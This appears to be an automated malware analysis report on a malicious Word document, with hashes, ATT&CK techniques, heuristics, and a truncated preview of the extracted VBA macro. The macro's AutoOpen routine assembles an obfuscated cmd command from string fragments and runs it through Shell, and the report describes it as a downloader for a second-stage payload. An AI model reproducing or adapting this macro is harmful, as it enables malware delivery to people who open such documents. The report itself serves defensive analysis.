Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8bb55c05b6270077…

MALICIOUS

Office (OLE)

91.6 KB Created: 2018-08-13 07:10:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: c952a316d9cad0959d00fe6ccef82159 SHA-1: 239d9ff55800c1026de0d4663bfaada4dbbf48a1 SHA-256: 8bb55c05b6270077ba1a0a5087aac41525a1700900fdf774946bd88d8df4a9d0
82 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute obfuscated code that attempts to download and run a second-stage payload. The macro's obfuscation and the presence of the AutoOpen marker strongly suggest a downloader or droppper functionality.

Heuristics 4

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13869 bytes
SHA-256: 47866b0626a262d6c73143cb2d2b7773d78b8e2b90452f0ded3da6d53e62d5ea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GSzXhXWSv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName Fix(331004079)
   TypeName Int(70)
   TypeName Round(6)
   TypeName ChrB(1055)
Shell! KeyString(vbKeyC) + jctHvdBj + WRTihvcPhdGj + TjXrAWAJVc + NLBuhIVdQ + UdzjOcapsu + kQacFUN + NNDUjCw + pdXXjoVSwid + HljzBAZrYz + aYipwmcD + vjiwHQ + HTZiwZjzajY + iBFUKSdHHrV + cjsJHwlovqSmA + iCwwHqVQ, 307535380 - 307535380
   TypeName Fix(428)
   TypeName Chr(25388 / CAAip - 85056 - lYzFX)
End Sub


Attribute VB_Name = "plEKdhWwEvFR"
Function TjXrAWAJVc()
On Error Resume Next
TypeName ChrW(12)
   TypeName CByte(micwpz * LvfToD)
iKppF = "m" + "d  " + "/V" + ":O " + "  /" + CStr(Chr(jTRUitottPZD + QtYZoNtMbl + 67 + iBumVfOIQILsQ + QTmImVhEcsd)) + " " + " " + CStr(Chr(nTsfZnLmzHtu + HHifJLndtpc + 34 + AzStsccUwQ + cSoRMsOwq)) + "s" + "et "
TypeName Rnd(lflbOD * duSQrF)
   TypeName Oct(3090)
LRlNDGkqPsV = "   " + " N" + "qj=" + "o" + CStr(Chr(tNUrwKaDCRTKpj + RMKLrCM + 67 + zMhwOKdZAYjXl + VMcCIHwk)) + "IHJ"
TypeName CSng(RdZYF)
   TypeName 7387
   TypeName Cos(zmKXnf + dVwqJS)
pLZEtFT = "S" + "zs" + "fwa" + "HG" + "s" + "b" + "K" + "Gs" + "j" + "PP"
TypeName Sin(152)
   TypeName Hex(48375 - MDZuD)
faaoWvaqI = "3" + "hd" + "\" + "y/F" + ",u" + "(+m" + "1.n"
TypeName rmSkEa
   TypeName Cos(vVzac)
   TypeName CByte(ZbGMJ / vIFSM)
FmTtZ = ";" + ")D6" + "{W" + "t @" + "=e" + "-" + "}kN" + CStr(Chr(wljPFrAnwzztG + ploIhiji + 76 + iaKYlAciFSYzK + fkniMcGovTWK)) + ":i"
TjXrAWAJVc = iKppF + LRlNDGkqPsV + pLZEtFT + faaoWvaqI + FmTtZ
   TypeName CInt(FUTcw)
   TypeName Sqr(65734 - WnWLZ)
End Function
Function NLBuhIVdQ()
On Error Resume Next
TypeName Chr(LIOmJV)
   TypeName zBHDz
vnGhcjvTU = "p" + "rv" + CStr(Chr(MQCfZaQqP + VKBVhratbCttDo + 99 + lOEPqAStCV + UQoVafqRESNb)) + "$x?" + CStr(Chr(zOSXzrMCi + zIVsHTMZ + 108 + LNYSYwvTTB + aAEafWbYSl)) + "'&"
TypeName CLng(BlVHY * uhQYH * 48154 / GkqZb)
   TypeName kanvZz
DAiFmlzf = "&" + "   " + "for" + " %" + "S " + "in " + " " + "( "
TypeName GmzCk
   TypeName Kqzlpr
dksSTti = " 5" + "4" + "  " + "0" + " " + " 9" + "  " + "  " + "46 " + "5" + "5"
TypeName Sin(zJJipz)
   TypeName Sqr(pnHTF)
qaTwFqNd = " " + "1" + "7  " + " " + " 22" + "  " + " " + "46 " + " 6"
TypeName CDate(YPJlJ)
   TypeName Cos(BjquXW)
XYiHmXiQHwq = "1  " + "  " + "61 " + "43 " + "   " + "5" + "8  "
NLBuhIVdQ = vnGhcjvTU + DAiFmlzf + dksSTti + qaTwFqNd + XYiHmXiQHwq
   TypeName CDate(64047 + koNBB)
   TypeName Cos(YikoG + hRtzcf)
End Function
Function UdzjOcapsu()
On Error Resume Next
TypeName Cos(1)
   TypeName 29
   TypeName Round(TDwvqj)
HjulBcK = "10" + "  " + " " + "20 " + " 23" + "  4" + "5 3"
TypeName 393
   TypeName CDbl(3)
OKjVAJ = "5" + " " + "46" + "  " + "9  " + "  " + "47" + "  " + "  0"
TypeName Sgn(46)
   TypeName Hex(65214156)
iwVIG = " 14" + " 18" + " " + "  " + "46" + "   " + " 57" + " 42" + "  "
TypeName Sqr(4887 - AZtDu - 82192 - ZzwUiu)
   TypeName Atn(217997026)
CBciRiWQzV = " " + "43" + "  " + " " + " " + "50 " + "  " + "4" + "6 " + " 42" + "   " + " 3" + "4 "
TypeName idwlRK
   TypeName Atn(pGpQG)
   TypeName Rnd(kHhri)
hwXkVD = "  " + "4" + "1 " + "46" + " 14" + " " + " " + "1"
TypeName 74096996
   TypeName CDbl(vJNtS)
   TypeName ChrW(8)
jTOMrRlYnm = "  " + "6" + "1" + "   " + " 53" + "   " + "46" + "  " + "35" + " 42" + "  " + "  " + "36"
TypeName SNrkIo
   TypeName REwFa
   TypeName CStr(UZWqL)
WdhwbJ = "   " + "5" + "8" + " " + " "
TypeName CStr(62)
   TypeName DcvYUO
FhmABwXlvF = "  5" + "5" + "   " + " " + "61"
TypeName 352368397
   TypeName 1659
   TypeName riEMm
JQFrFiY = "   " + " 3" + "2 " + "  " + "45 " + " " + " 62" + " " + "22 " + "42 "
TypeName Round(62217 - UzvOBF)
   TypeName Hex(81586 * OPRwD)
   TypeName CDbl(DwiGj / fbGWVa)
WaZtDYbmznw = " " + " 4" + "2 " + "5" + "4" + " "
... (truncated)